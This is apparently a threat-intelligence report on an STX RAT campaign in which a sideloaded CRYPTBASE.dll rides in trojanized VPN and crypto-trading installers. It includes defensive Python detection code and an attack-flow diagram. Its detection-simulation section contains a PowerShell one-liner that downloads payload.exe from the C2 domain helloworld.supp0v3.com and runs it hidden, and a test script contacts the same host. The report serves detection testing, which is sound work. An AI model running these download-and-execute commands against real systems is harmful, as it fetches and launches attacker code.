From Crypto Wallets to a 100M-User VPN: Inside an Active STX RAT Supply Chain Campaign
Summary
Researchers uncovered an active supply chain campaign in which a threat actor abused DLL sideloading with a malicious CRYPTBASE.dll to deploy the STX remote access trojan (STX RAT) through trojanized installers for cryptocurrency trading software and the X-VPN client. The operation relied on a single Bitbucket repository to distribute the infected packages and rotated command-and-control domains under the supp0v3.com root. By targeting both users of financial exchange tools and a widely used VPN service, the attackers positioned themselves to steal credentials and other sensitive data at scale. Detection content was updated to cover the shared sideloading method and the common infrastructure.
Investigation
Analysts identified 11 malicious packages that all used the same CRYPTBASE.dll sideloading chain to load STX RAT directly in memory. The trojanized installers were hosted in a Bitbucket repository named amos-trading, and commit metadata linked the activity to the alias Leda Elacoate. After public exposure, the operators rotated infrastructure from helloworld.supp0v3.com to welcome.supp0v3.com. YARA analysis confirmed that STX RAT was the final payload in every examined sample.
Mitigation
X-VPN addressed the issue in Windows version 77.5.3, which enforces strict DLL loading from system directories, performs startup-time DLL hash validation, and applies per-process loading policies. Blocking supp0v3.com and its subdomains at the network perimeter can disrupt command-and-control traffic. Organizations should also reinforce software download hygiene and limit installations to verified vendor sources.
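The mitigation paragraph names three vendor-side controls. The following is an added example, not X-VPN's code, of the startup-time DLL hash validation and application-directory policy it describes, run against a constructed application directory with dummy files. The manifest format (DLL name to expected SHA-256), the rule that CRYPTBASE.dll must never be resolved from the application directory, and the helper names are assumptions made for this example.

```python
# Added example, not X-VPN's implementation: a startup integrity check of the kind the
# mitigation paragraph describes. The manifest format, the system-only DLL policy and
# the demo directory contents are assumptions constructed for this example.
import hashlib
import os
import tempfile
from typing import Dict, List

# DLLs that must only ever be resolved from the Windows system directory. CRYPTBASE.dll
# is the one sideloaded in this campaign; a vendor would extend this list.
SYSTEM_ONLY_DLLS = {"cryptbase.dll"}


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def manifest_for(files: Dict[str, bytes]) -> Dict[str, str]:
    """Build a name -> SHA-256 manifest from in-memory file contents (used for the demo)."""
    return {name: hashlib.sha256(data).hexdigest() for name, data in files.items()}


def validate_app_dir(app_dir: str, manifest: Dict[str, str]) -> List[str]:
    """Return policy violations found in app_dir; an empty list means startup may proceed.

    Three checks: (1) a system-only DLL has been dropped next to the executable,
    (2) a manifest-listed DLL is missing or its hash does not match,
    (3) a DLL not in the manifest is present in the application directory.
    """
    violations: List[str] = []
    # lower-cased name -> on-disk name, so comparisons are case-insensitive like NTFS
    present = {n.lower(): n for n in os.listdir(app_dir) if n.lower().endswith(".dll")}
    listed = {m.lower() for m in manifest}

    for name in sorted(present):
        if name in SYSTEM_ONLY_DLLS:
            violations.append(f"system-only DLL present in application directory: {present[name]}")

    for name, expected in manifest.items():
        path = os.path.join(app_dir, name)
        if not os.path.exists(path):
            violations.append(f"manifest DLL missing: {name}")
        elif sha256_file(path) != expected.lower():
            violations.append(f"hash mismatch: {name}")

    for name in sorted(present):
        if name not in listed and name not in SYSTEM_ONLY_DLLS:
            violations.append(f"unlisted DLL in application directory: {present[name]}")
    return violations


def build_demo_dir() -> str:
    """Constructed demo directory: one intact DLL, one tampered DLL and a dropped
    CRYPTBASE.dll. All contents are dummy bytes, not real binaries."""
    d = tempfile.mkdtemp(prefix="xvpn_demo_")
    for name, data in {
        "vpncore.dll": b"legitimate vendor code",
        "helper.dll": b"tampered helper",
        "CRYPTBASE.dll": b"sideloaded loader",
    }.items():
        with open(os.path.join(d, name), "wb") as f:
            f.write(data)
    return d


# What the vendor shipped: the helper's original contents, before tampering.
DEMO_MANIFEST = manifest_for({
    "vpncore.dll": b"legitimate vendor code",
    "helper.dll": b"original helper",
})

if __name__ == "__main__":
    for v in validate_app_dir(build_demo_dir(), DEMO_MANIFEST):
        print("BLOCK:", v)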
Response
Defenders should alert on any process that loads CRYPTBASE.dll from a non-system path and investigate for signs of in-memory STX RAT execution. The published STX RAT YARA rule should be deployed across EDR platforms, and outbound HTTPS traffic to supp0v3.com should be monitored closely. All endpoints should be updated to the patched X-VPN version or have the vulnerable software removed. Threat hunting should also focus on reflective code-loading behavior associated with the malware’s multi-stage unpacking chain.
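The two Response-section checks, the CRYPTBASE.dll load from a non-system path and the connection to supp0v3.com, as an added example that is not part of the original report or its published detection content. It runs both checks over constructed Sysmon-style events (Event ID 7 ImageLoaded, Event ID 3 DestinationHostname); the event records, the assumption that the system drive is C:, and the function names are all constructed for this example.

```python
# Added example (not from the original report or its published detection content):
# the two Response-section checks run over constructed Sysmon-style events.
#   1. CRYPTBASE.dll loaded from outside the Windows system directories
#      (Sysmon Event ID 7, ImageLoaded), the sideloading primitive shared by
#      every package in the campaign.
#   2. A network connection (Sysmon Event ID 3) to supp0v3.com or any subdomain.
# Field names follow Sysmon's schema; the records in SAMPLE_EVENTS are constructed
# for this example, not captured telemetry.
import ntpath
from typing import Dict, Iterable, List, Tuple

# Assumption: the system drive is C:. In production derive these from %SystemRoot%.
SYSTEM_DLL_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
C2_ROOT = "supp0v3.com"


def normalize_path(path: str) -> str:
    """Lower-case, fix separators and collapse '..' so a path that merely starts
    with 'C:\\Windows\\System32\\..\\' is not mistaken for a system directory."""
    return ntpath.normpath(path.replace("/", "\\")).lower()


def is_system_path(path: str) -> bool:
    p = normalize_path(path)
    return any(p.startswith(d + "\\") for d in SYSTEM_DLL_DIRS)


def is_cryptbase_sideload(event: Dict) -> bool:
    """Image load of cryptbase.dll from anywhere but System32 or SysWOW64."""
    if event.get("EventID") != 7:
        return False
    loaded = event.get("ImageLoaded", "")
    if ntpath.basename(loaded).lower() != "cryptbase.dll":
        return False
    return not is_system_path(loaded)


def is_c2_domain(hostname: str) -> bool:
    """Exact root or a real subdomain only. A bare endswith('supp0v3.com') would
    also match 'notsupp0v3.com'; a trailing FQDN dot is tolerated."""
    h = hostname.strip().rstrip(".").lower()
    return h == C2_ROOT or h.endswith("." + C2_ROOT)


def is_c2_connection(event: Dict) -> bool:
    return event.get("EventID") == 3 and is_c2_domain(event.get("DestinationHostname", ""))


def run_detections(events: Iterable[Dict]) -> List[Tuple[str, Dict]]:
    """Return (rule_name, event) pairs for every event that matches either check."""
    hits: List[Tuple[str, Dict]] = []
    for ev in events:
        if is_cryptbase_sideload(ev):
            hits.append(("cryptbase_sideload", ev))
        if is_c2_connection(ev):
            hits.append(("supp0v3_c2", ev))
    return hits


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    # Benign: system copy loaded by a system process
    {"EventID": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\cryptbase.dll"},
    # Sideload: trojanized installer loads the DLL sitting next to it
    {"EventID": 7, "Image": r"C:\Users\victim\Downloads\XVPN_Setup.exe",
     "ImageLoaded": r"C:\Users\victim\Downloads\CRYPTBASE.dll"},
    # Path that textually starts with System32 but resolves elsewhere
    {"EventID": 7, "Image": r"C:\Users\victim\AppData\Local\Temp\mexc.exe",
     "ImageLoaded": r"C:\Windows\System32\..\..\Users\victim\AppData\Local\Temp\CRYPTBASE.dll"},
    # Benign: 32-bit process on 64-bit Windows loads the WOW64 system copy
    {"EventID": 7, "Image": r"C:\Program Files (x86)\App\app.exe",
     "ImageLoaded": r"C:\Windows\SysWOW64\cryptbase.dll"},
    # C2: rotated subdomain
    {"EventID": 3, "Image": r"C:\Users\victim\Downloads\XVPN_Setup.exe",
     "DestinationHostname": "welcome.supp0v3.com", "DestinationPort": 443},
    # Not C2: lookalike that a naive suffix match would flag
    {"EventID": 3, "Image": r"C:\Program Files\Browser\browser.exe",
     "DestinationHostname": "notsupp0v3.com", "DestinationPort": 443},
    # C2: original subdomain, logged as an FQDN with trailing dot
    {"EventID": 3, "Image": r"C:\Users\victim\Downloads\XVPN_Setup.exe",
     "DestinationHostname": "helloworld.supp0v3.com.", "DestinationPort": 443},
]

if __name__ == "__main__":
    for name, ev in run_detections(SAMPLE_EVENTS):
        target = ev.get("ImageLoaded") or ev.get("DestinationHostname")
        print(f"[{name}] {ev['Image']} -> {target}")
```

In Sigma terms the first check is `ImageLoaded|endswith: '\cryptbase.dll'` with a filter excluding `ImageLoaded|startswith` of the System32 and SysWOW64 prefixes; the second is worth applying to DNS query telemetry (Sysmon Event ID 22 QueryName) as well as to connection events, since a sinkholed or taken-down domain still produces the lookup.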
Attack Flow
graph TB
    %% Class definitions
    classDef technique fill:#ffcc99
    classDef malware fill:#ff9999
    classDef file fill:#ccccff
    classDef operator fill:#ff9900

    %% Node definitions
    tech_supply_chain["<b>Technique</b> – <b>T1195.002 Supply Chain Compromise: Compromise Software Supply Chain</b><br/><b>Description</b>: attacker injected malicious CRYPTBASE.dll into legitimate installers hosted in a Bitbucket repository."]
    class tech_supply_chain technique
    dll_cryptbase["<b>File</b> – <b>Name</b>: CRYPTBASE.dll (malicious)"]
    class dll_cryptbase file
    file_installer["<b>File</b> – <b>Name</b>: Trojanized Installer (e.g., X-VPN, Binance, MEXC)"]
    class file_installer file
    tech_user_exec["<b>Technique</b> – <b>T1204.002 User Execution: Malicious File</b><br/><b>Description</b>: victims download and run the trojanized installer."]
    class tech_user_exec technique
    tech_masquerade["<b>Technique</b> – <b>T1036.008 Masquerading: Masquerade File Type</b><br/><b>Description</b>: malicious package is presented as a legitimate VPN or crypto-trading installer."]
    class tech_masquerade technique
    tech_dll_hijack["<b>Technique</b> – <b>T1574.001 Hijack Execution Flow: DLL</b><br/><b>Description</b>: installer loads CRYPTBASE.dll placed in the program directory, causing the legitimate application to load the malicious DLL."]
    class tech_dll_hijack technique
    tech_path_intercept["<b>Technique</b> – <b>T1574.008 Path Interception: Search Order Hijacking</b><br/><b>Description</b>: Windows DLL search order loads the attacker's DLL before the system copy."]
    class tech_path_intercept technique
    tech_reflective["<b>Technique</b> – <b>T1620 Reflective Code Loading</b><br/><b>Description</b>: the malicious DLL unpacks and injects the STX RAT payload into memory using reflective loading, leaving no on-disk artifacts."]
    class tech_reflective technique
    tech_embedded["<b>Technique</b> – <b>T1027.009 Embedded Payloads</b><br/><b>Description</b>: the DLL contains an embedded multi-stage unpack chain and the STX RAT core."]
    class tech_embedded technique
    malware_STX["<b>Malware</b> – <b>Name</b>: STX RAT<br/><b>Function</b>: remote access trojan providing credential theft and data exfiltration."]
    class malware_STX malware
    tech_c2["<b>Technique</b> – <b>T1071.001 Application Layer Protocol: Web Protocols</b><br/><b>Description</b>: the RAT communicates with C2 over HTTPS to subdomains of supp0v3.com."]
    class tech_c2 technique
    tech_cred_browser["<b>Technique</b> – <b>T1555.003 Credentials from Web Browsers</b><br/><b>Description</b>: STX RAT harvests saved browser credentials, session tokens, and system account data."]
    class tech_cred_browser technique
    tech_exfil["<b>Technique</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/><b>Description</b>: collected credentials and system data are exfiltrated via the same HTTPS C2 channel."]
    class tech_exfil technique

    %% Connections
    tech_supply_chain -->|injects| dll_cryptbase
    dll_cryptbase -->|placed in| file_installer
    file_installer -->|downloaded and executed by victim| tech_user_exec
    tech_user_exec -->|leads to| tech_masquerade
    tech_masquerade -->|enables| tech_dll_hijack
    tech_dll_hijack -->|uses| tech_path_intercept
    tech_path_intercept -->|allows| tech_reflective
    tech_reflective -->|loads| malware_STX
    malware_STX -->|uses| tech_embedded
    malware_STX -->|communicates via| tech_c2
    malware_STX -->|harvests| tech_cred_browser
    tech_cred_browser -->|data exfiltrated via| tech_exfil
Detections
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)
IOCs (HashSha256) to detect: From Crypto Wallets to a 100M-User VPN: Inside an Active STX RAT Supply Chain Campaign
Detection of Supp0v3.com C2 Infrastructure in STX RAT Campaign [Windows Network Connection]
Detection of CRYPTBASE.dll Sideloading to Deploy STX RAT [Windows Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
An attacker who has compromised a low-privilege user account uses a PowerShell one-liner to download a malicious payload from the C2 server helloworld.supp0v3.com. This leverages T1071.001 (Web protocol C2) and T1204.002 (User execution), while the payload itself is obfuscated (T1027, T1027.009) and masqueraded as a legitimate executable (T1036.005/008). The outbound connection to the malicious domain should be captured by the firewall or endpoint network-connection log and consequently fire the Sigma rule. The rule keys on the destination hostname, not on what the server returns, so before running this anywhere point helloworld.supp0v3.com at a lab listener (hosts-file entry or internal DNS override) rather than letting the test contact live adversary infrastructure. Note also that the real implant used HTTPS; the simulation uses plain HTTP, which is sufficient for a hostname-based rule but will not exercise TLS-inspection content.

# Download malicious payload from the Supp0v3 C2 domain
$url = "http://helloworld.supp0v3.com/payload.exe"
$out = "$env:TEMP\payload.exe"
Invoke-WebRequest -Uri $url -UseBasicParsing -OutFile $out
# Execute the payload. Only do this against a lab listener that serves a harmless
# dummy file; the regression script omits this step entirely.
Start-Process -FilePath $out -WindowStyle Hidden
Regression Test Script:
# TC-20260609-A1B2C – Simulate STX RAT C2 connection to helloworld.supp0v3.com
try {
    # Step 1: Prepare dummy payload (avoid real malware execution)
    $payloadPath = "$env:TEMP\payload.exe"
    Set-Content -Path $payloadPath -Value "This is a dummy executable for testing." -Encoding ASCII

    # Step 2: Simulate outbound HTTP request to the malicious domain.
    # The response is discarded instead of being written over the dummy file, so
    # nothing served by the domain ever lands on disk. The connection attempt is the
    # telemetry the rule keys on; if the name does not resolve, no connection is
    # made and nothing is logged, so make sure it resolves to a lab listener first.
    $c2Url = "http://helloworld.supp0v3.com/payload.exe"
    Invoke-WebRequest -Uri $c2Url -UseBasicParsing | Out-Null

    # Step 3: "Execute" the payload (no real execution for safety)
    Write-Host "Simulated execution of payload at $payloadPath"
    Write-Host "Simulation completed – check SIEM for alert."
} catch {
    Write-Error "Simulation failed: $_"
}
Cleanup Commands:
# Remove the dummy payload and any residual files
$payloadPath = "$env:TEMP\payload.exe"
if (Test-Path $payloadPath) {
    Remove-Item -Path $payloadPath -Force
    Write-Host "Cleaned up payload file."
} else {
    Write-Host "No payload file found – nothing to clean."
}